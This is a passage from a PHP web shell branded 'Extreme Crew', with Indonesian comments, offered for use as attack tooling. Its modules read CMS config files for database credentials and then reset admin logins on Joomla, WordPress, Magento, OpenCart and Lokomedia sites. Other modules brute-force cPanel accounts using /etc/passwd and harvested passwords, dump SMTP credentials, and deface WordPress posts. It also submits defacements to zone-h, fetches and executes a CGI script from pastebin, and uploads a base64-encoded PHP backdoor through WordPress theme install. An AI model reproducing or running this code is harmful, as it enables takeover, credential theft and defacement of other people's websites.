  1075. $dbname = ambilkata($config,"db = '","'");
  1076. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1077. $prefix = $dbprefix."users";
  1078. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1079. $db = mysql_select_db($dbname);
  1080. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1081. $result = mysql_fetch_array($q);
  1082. $id = $result['id'];
  1083. $site = ambilkata($config,"sitename = '","'");
  1084. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1085. echo "Config => ".$file_conf."<br>";
  1086. echo "CMS => Joomla<br>";
  1087. if($site == '') {
  1088. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1089. } else {
  1090. echo "Sitename => $site<br>";
  1091. }
  1092. if(!$update OR !$conn OR !$db) {
  1093. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1094. } else {
  1095. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1096. }
  1097. mysql_close($conn);
  1098. } elseif(preg_match("/WordPress/",$config)) {
  1099. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1100. $dbuser = ambilkata($config,"DB_USER', '","'");
  1101. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1102. $dbname = ambilkata($config,"DB_NAME', '","'");
  1103. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1104. $prefix = $dbprefix."users";
  1105. $option = $dbprefix."options";
  1106. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1107. $db = mysql_select_db($dbname);
  1108. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1109. $result = mysql_fetch_array($q);
  1110. $id = $result[ID];
  1111. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1112. $result2 = mysql_fetch_array($q2);
  1113. $target = $result2[option_value];
  1114. if($target == '') {
  1115. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1116. } else {
  1117. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1118. }
  1119. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1120. echo "Config => ".$file_conf."<br>";
  1121. echo "CMS => Wordpress<br>";
  1122. echo $url_target;
  1123. if(!$update OR !$conn OR !$db) {
  1124. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1125. } else {
  1126. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1127. }
  1128. mysql_close($conn);
  1129. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1130. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1131. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1132. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1133. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1134. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1135. $prefix = $dbprefix."admin_user";
  1136. $option = $dbprefix."core_config_data";
  1137. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1138. $db = mysql_select_db($dbname);
  1139. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1140. $result = mysql_fetch_array($q);
  1141. $id = $result[user_id];
  1142. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1143. $result2 = mysql_fetch_array($q2);
  1144. $target = $result2[value];
  1145. if($target == '') {
  1146. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1147. } else {
  1148. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1149. }
  1150. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1151. echo "Config => ".$file_conf."<br>";
  1152. echo "CMS => Magento<br>";
  1153. echo $url_target;
  1154. if(!$update OR !$conn OR !$db) {
  1155. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1156. } else {
  1157. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1158. }
  1159. mysql_close($conn);
  1160. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1161. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1162. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1163. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1164. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1165. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1166. $prefix = $dbprefix."user";
  1167. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1168. $db = mysql_select_db($dbname);
  1169. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1170. $result = mysql_fetch_array($q);
  1171. $id = $result[user_id];
  1172. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1173. if($target == '') {
  1174. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1175. } else {
  1176. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1177. }
  1178. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1179. echo "Config => ".$file_conf."<br>";
  1180. echo "CMS => OpenCart<br>";
  1181. echo $url_target;
  1182. if(!$update OR !$conn OR !$db) {
  1183. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1184. } else {
  1185. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1186. }
  1187. mysql_close($conn);
  1188. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1189. $dbhost = ambilkata($config,'server = "','"');
  1190. $dbuser = ambilkata($config,'username = "','"');
  1191. $dbpass = ambilkata($config,'password = "','"');
  1192. $dbname = ambilkata($config,'database = "','"');
  1193. $prefix = "users";
  1194. $option = "identitas";
  1195. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1196. $db = mysql_select_db($dbname);
  1197. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1198. $result = mysql_fetch_array($q);
  1199. $target = $result[alamat_website];
  1200. if($target == '') {
  1201. $target2 = $result[url];
  1202. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1203. if($target2 == '') {
  1204. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1205. } else {
  1206. $cek_login3 = file_get_contents("$target2/adminweb/");
  1207. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1208. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1209. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1210. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1211. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1212. } else {
  1213. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1214. }
  1215. }
  1216. } else {
  1217. $cek_login = file_get_contents("$target/adminweb/");
  1218. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1219. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1220. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1221. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1222. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1223. } else {
  1224. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1225. }
  1226. }
  1227. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1228. echo "Config => ".$file_conf."<br>";
  1229. echo "CMS => Lokomedia<br>";
  1230. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1231. echo $url_target2;
  1232. } else {
  1233. echo $url_target;
  1234. }
  1235. if(!$update OR !$conn OR !$db) {
  1236. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1237. } else {
  1238. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1239. }
  1240. mysql_close($conn);
  1241. }
  1242. }
  1243. }
  1244. } else {
  1245. echo "<center>
  1246. <h1>Auto Edit User Config</h1>
  1247. <form method='post'>
  1248. DIR Config: <br>
  1249. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1250. Set User & Pass: <br>
  1251. <input type='text' name='user_baru' value='Extreme Crew' placeholder='user_baru'><br>
  1252. <input type='text' name='pass_baru' value='Extreme Crew' placeholder='pass_baru'><br>
  1253. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1254. </form>
  1255. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1256. ";
  1257. }
  1258. } elseif($_GET['do'] == 'cpanel') {
  1259. if($_POST['crack']) {
  1260. $usercp = explode("\r\n", $_POST['user_cp']);
  1261. $passcp = explode("\r\n", $_POST['pass_cp']);
  1262. $i = 0;
  1263. foreach($usercp as $ucp) {
  1264. foreach($passcp as $pcp) {
  1265. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1266. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1267. } else {
  1268. $_SESSION[$ucp] = "1";
  1269. $_SESSION[$pcp] = "1";
  1270. if($ucp == '' || $pcp == '') {
  1271.  
  1272. } else {
  1273. $i++;
  1274. if(function_exists('posix_getpwuid')) {
  1275. $domain_cp = file_get_contents("/etc/named.conf");
  1276. if($domain_cp == '') {
  1277. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  1278. } else {
  1279. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1280. foreach($domains_cp[1] as $dj) {
  1281. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1282. $user_cp_url = $user_cp_url['name'];
  1283. if($user_cp_url == $ucp) {
  1284. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  1285. break;
  1286. }
  1287. }
  1288. }
  1289. } else {
  1290. $dom = "<font color=red>function is Disable by system</font>";
  1291. }
  1292. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  1293. }
  1294. }
  1295. }
  1296. }
  1297. }
  1298. if($i == 0) {
  1299. } else {
  1300. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>Extreme Crew.</font>";
  1301. }
  1302. } else {
  1303. echo "<center>
  1304. <form method='post'>
  1305. USER: <br>
  1306. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1307. $_usercp = fopen("/etc/passwd","r");
  1308. while($getu = fgets($_usercp)) {
  1309. if($getu == '' || !$_usercp) {
  1310. echo "<font color=red>Can't read /etc/passwd</font>";
  1311. } else {
  1312. preg_match_all("/(.*?):x:/", $getu, $u);
  1313. foreach($u[1] as $user_cp) {
  1314. if(is_dir("/home/$user_cp/public_html")) {
  1315. echo "$user_cp\n";
  1316. }
  1317. }
  1318. }
  1319. }
  1320. echo "</textarea><br>
  1321. PASS: <br>
  1322. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1323. function cp_pass($dir) {
  1324. $pass = "";
  1325. $dira = scandir($dir);
  1326. foreach($dira as $dirb) {
  1327. if(!is_file("$dir/$dirb")) continue;
  1328. $ambil = file_get_contents("$dir/$dirb");
  1329. if(preg_match("/WordPress/", $ambil)) {
  1330. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1331. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1332. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1333. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1334. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1335. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1336. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1337. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1338. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1339. } elseif(preg_match("/^[client]$/", $ambil)) {
  1340. preg_match("/password=(.*?)/", $ambil, $pass1);
  1341. if(preg_match('/"/', $pass1[1])) {
  1342. $pass1[1] = str_replace('"', "", $pass1[1]);
  1343. $pass .= $pass1[1]."\n";
  1344. } else {
  1345. $pass .= $pass1[1]."\n";
  1346. }
  1347. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1348. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1349. }
  1350. }
  1351. echo $pass;
  1352. }
  1353. $cp_pass = cp_pass($dir);
  1354. echo $cp_pass;
  1355. echo "</textarea><br>
  1356. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1357. </form>
  1358. <br><span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1359. }
  1360. } elseif($_GET['do'] == 'smtp') {
  1361. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1362. function scj($dir) {
  1363. $dira = scandir($dir);
  1364. foreach($dira as $dirb) {
  1365. if(!is_file("$dir/$dirb")) continue;
  1366. $ambil = file_get_contents("$dir/$dirb");
  1367. $ambil = str_replace("$", "", $ambil);
  1368. if(preg_match("/JConfig|joomla/", $ambil)) {
  1369. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1370. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1371. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1372. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1373. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1374. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1375. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1376. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1377. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1378. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1379. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1380. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1381. }
  1382. }
  1383. }
  1384. $smpt_hunter = scj($dir);
  1385. echo $smpt_hunter;
  1386. } elseif($_GET['do'] == 'auto_wp') {
  1387. if($_POST['hajar']) {
  1388. $title = htmlspecialchars($_POST['new_title']);
  1389. $pn_title = str_replace(" ", "-", $title);
  1390. if($_POST['cek_edit'] == "Y") {
  1391. $script = $_POST['edit_content'];
  1392. } else {
  1393. $script = $title;
  1394. }
  1395. $conf = $_POST['config_dir'];
  1396. $scan_conf = scandir($conf);
  1397. foreach($scan_conf as $file_conf) {
  1398. if(!is_file("$conf/$file_conf")) continue;
  1399. $config = file_get_contents("$conf/$file_conf");
  1400. if(preg_match("/WordPress/", $config)) {
  1401. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1402. $dbuser = ambilkata($config,"DB_USER', '","'");
  1403. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1404. $dbname = ambilkata($config,"DB_NAME', '","'");
  1405. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1406. $prefix = $dbprefix."posts";
  1407. $option = $dbprefix."options";
  1408. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1409. $db = mysql_select_db($dbname);
  1410. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1411. $result = mysql_fetch_array($q);
  1412. $id = $result[ID];
  1413. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1414. $result2 = mysql_fetch_array($q2);
  1415. $target = $result2[option_value];
  1416. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1417. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1418. echo "<div style='margin: 5px auto;'>";
  1419. if($target == '') {
  1420. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1421. } else {
  1422. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1423. }
  1424. if(!$update OR !$conn OR !$db) {
  1425. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1426. } else {
  1427. echo "<font color=lime>sukses di ganti.</font><br>";
  1428. }
  1429. echo "</div>";
  1430. mysql_close($conn);
  1431. }
  1432. }
  1433. } else {
  1434. echo "<center>
  1435. <h1>Auto Edit Title+Content WordPress</h1>
  1436. <form method='post'>
  1437. DIR Config: <br>
  1438. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1439. Set Title: <br>
  1440. <input type='text' name='new_title' value='Hacked by Extreme Crew' placeholder='New Title'><br><br>
  1441. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1442. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1443. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1444. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1445. </form>
  1446. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1447. ";
  1448. }
  1449. } elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  1450. } elseif($_GET['do'] == 'zoneh') {
  1451. if($_POST['submit']) {
  1452. $domain = explode("\r\n", $_POST['url']);
  1453. $nick = $_POST['nick'];
  1454. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1455. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1456. function zoneh($url,$nick) {
  1457. $ch = curl_init("http://www.zone-h.com/notify/single");
  1458. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1459. curl_setopt($ch, CURLOPT_POST, true);
  1460. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1461. return curl_exec($ch);
  1462. curl_close($ch);
  1463. }
  1464. foreach($domain as $url) {
  1465. $zoneh = zoneh($url,$nick);
  1466. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1467. echo "$url -> <font color=lime>OK</font><br>";
  1468. } else {
  1469. echo "$url -> <font color=red>ERROR</font><br>";
  1470. }
  1471. }
  1472. } else {
  1473. echo "<center><form method='post'>
  1474. <u>Defacer</u>: <br>
  1475. <input type='text' name='nick' size='50' value='Extreme Crew'><br>
  1476. <u>Domains</u>: <br>
  1477. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1478. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1479. </form>";
  1480. }
  1481. echo "</center>";
  1482. } elseif($_GET['do'] == 'cgi') {
  1483. $cgi_dir = mkdir('ec_cgi', 0755);
  1484. $file_cgi = "ec_cgi/cgi.izo";
  1485. $isi_htcgi = "AddHandler cgi-script .izo";
  1486. $htcgi = fopen(".htaccess", "w");
  1487. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1488. $cgi = fopen($file_cgi, "w");
  1489. fwrite($cgi, $cgi_script);
  1490. fwrite($htcgi, $isi_htcgi);
  1491. chmod($file_cgi, 0755);
  1492. echo "<iframe src='ec_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1493. } elseif($_GET['do'] == 'fake_root') {
  1494. ob_start();
  1495. $cwd = getcwd();
  1496. $ambil_user = explode("/", $cwd);
  1497. $user = $ambil_user[2];
  1498. if($_POST['reverse']) {
  1499. $site = explode("\r\n", $_POST['url']);
  1500. $file = $_POST['file'];
  1501. foreach($site as $url) {
  1502. $cek = getsource("$url/~$user/$file");
  1503. if(preg_match("/hacked/i", $cek)) {
  1504. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1505. }
  1506. }
  1507. } else {
  1508. echo "<center><form method='post'>
  1509. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1510. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1511. Domain: <br>
  1512. <textarea style='width: 450px; height: 250px;' name='url'>";
  1513. reverse($_SERVER['HTTP_HOST']);
  1514. echo "</textarea><br>
  1515. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1516. </form><br>
  1517. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1518. }
  1519. } elseif($_GET['do'] == 'adminer') {
  1520. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1521. function adminer($url, $isi) {
  1522. $fp = fopen($isi, "w");
  1523. $ch = curl_init();
  1524. curl_setopt($ch, CURLOPT_URL, $url);
  1525. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1526. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1527. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1528. curl_setopt($ch, CURLOPT_FILE, $fp);
  1529. return curl_exec($ch);
  1530. curl_close($ch);
  1531. fclose($fp);
  1532. ob_flush();
  1533. flush();
  1534. }
  1535. if(file_exists('adminer.php')) {
  1536. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1537. } else {
  1538. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1539. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1540. } else {
  1541. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1542. }
  1543. }
  1544. } elseif($_GET['do'] == 'auto_dwp') {
  1545. if($_POST['auto_deface_wp']) {
  1546. function anucurl($sites) {
  1547. $ch = curl_init($sites);
  1548. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1549. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1550. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1551. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1552. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1553. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1554. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1555. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1556. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1557. $data = curl_exec($ch);
  1558. curl_close($ch);
  1559. return $data;
  1560. }
  1561. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1562. $post = array(
  1563. "log" => "$userr",
  1564. "pwd" => "$pass",
  1565. "rememberme" => "forever",
  1566. "wp-submit" => "$wp_submit",
  1567. "redirect_to" => "$web",
  1568. "testcookie" => "1",
  1569. );
  1570. $ch = curl_init($cek);
  1571. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1572. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1573. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1574. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1575. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1576. curl_setopt($ch, CURLOPT_POST, 1);
  1577. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1578. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1579. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1580. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1581. $data = curl_exec($ch);
  1582. curl_close($ch);
  1583. return $data;
  1584. }
  1585. $scan = $_POST['link_config'];
  1586. $link_config = scandir($scan);
  1587. $script = htmlspecialchars($_POST['script']);
  1588. $user = "Extreme Crew";
  1589. $pass = "Extreme Crew";
  1590. $passx = md5($pass);
  1591. foreach($link_config as $dir_config) {
  1592. if(!is_file("$scan/$dir_config")) continue;
  1593. $config = file_get_contents("$scan/$dir_config");
  1594. if(preg_match("/WordPress/", $config)) {
  1595. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1596. $dbuser = ambilkata($config,"DB_USER', '","'");
  1597. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1598. $dbname = ambilkata($config,"DB_NAME', '","'");
  1599. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1600. $prefix = $dbprefix."users";
  1601. $option = $dbprefix."options";
  1602. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1603. $db = mysql_select_db($dbname);
  1604. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1605. $result = mysql_fetch_array($q);
  1606. $id = $result[ID];
  1607. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1608. $result2 = mysql_fetch_array($q2);
  1609. $target = $result2[option_value];
  1610. if($target == '') {
  1611. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1612. } else {
  1613. echo "[+] $target <br>";
  1614. }
  1615. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1616. if(!$conn OR !$db OR !$update) {
  1617. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1618. mysql_close($conn);
  1619. } else {
  1620. $site = "$target/wp-login.php";
  1621. $site2 = "$target/wp-admin/theme-install.php?upload";
  1622. $b1 = anucurl($site2);
  1623. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1624. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1625. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1626. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1627. $www = "m.php";
  1628. $fp5 = fopen($www,"w");
  1629. fputs($fp5,$upload3);
  1630. $post2 = array(
  1631. "_wpnonce" => "$anu2",
  1632. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1633. "themezip" => "@$www",
  1634. "install-theme-submit" => "Install Now",
  1635. );
  1636. $ch = curl_init("$target/wp-admin/update.php?cr0tz&action=upload-theme");
  1637. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1638. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1639. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1640. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1641. curl_setopt($ch, CURLOPT_POST, 1);
  1642. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1643. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1644. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1645. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1646. $data3 = curl_exec($ch);
  1647. curl_close($ch);
  1648. $y = date("Y");
  1649. $m = date("m");
  1650. $namafile = "id.php";
  1651. $fpi = fopen($namafile,"w");
  1652. fputs($fpi,$script);
  1653. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1654. curl_setopt($ch6, CURLOPT_POST, true);
  1655. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
